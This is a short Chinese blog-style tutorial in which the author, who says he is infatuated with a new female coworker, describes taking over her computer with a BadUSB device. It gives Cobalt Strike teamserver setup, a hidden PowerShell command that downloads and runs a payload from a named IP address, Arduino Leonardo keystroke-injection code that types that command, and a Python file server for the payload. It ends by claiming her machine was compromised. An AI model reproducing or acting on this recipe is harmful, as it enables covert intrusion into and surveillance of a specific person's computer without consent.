背景
公司前几天刚入职了一个小姐姐,看到她的第一眼,我发现我恋爱了。
所以我一定要拿到她的电脑权限!!!!
Badusb:伪造计算机交互设备
1.部署cs
服务器:
通过screen启动cs服务端
screnn -dmS xiaojiejie screnn -r xiaojiejie ./teamserver 111.229.77.212 520520
客户端启动
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
客户端连接
配置监听器:
生成后门下载链接
复制出
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"
安装Arduino IDE(回复公众号(渗透小姐姐的心)查看下载链接。)
设置开发版和编程器
编写代码
#include<Keyboard.h> void setup(){ Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))""); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(500); Keyboard.end(); } void loop() { }
指令过长
重新生成payload
保存到桌面
上传到服务器
使用python实现下载服务
python -m SimpleHTTPServer 8080
写入代码
#include<Keyboard.h> void setup(){ Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("cmd.exe /c powershell.exe IEX(New-ObjectNet.WebClient).DownloadString('http://111.229.77.212:8080/xiaojiejie.ps1')"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(500); Keyboard.end(); } void loop() { }
验证
取得开发版信息
硬件插入电脑
打开Arduino IDE
工具->版->选择“Arduino Leonardo”
工具->Port->选择“COM* (Arduino Leonardo)”
现在可以看到IDE右下角出现“Arduino Leonardo on COM*”
上传
插上小姐姐的电脑,成功上线!
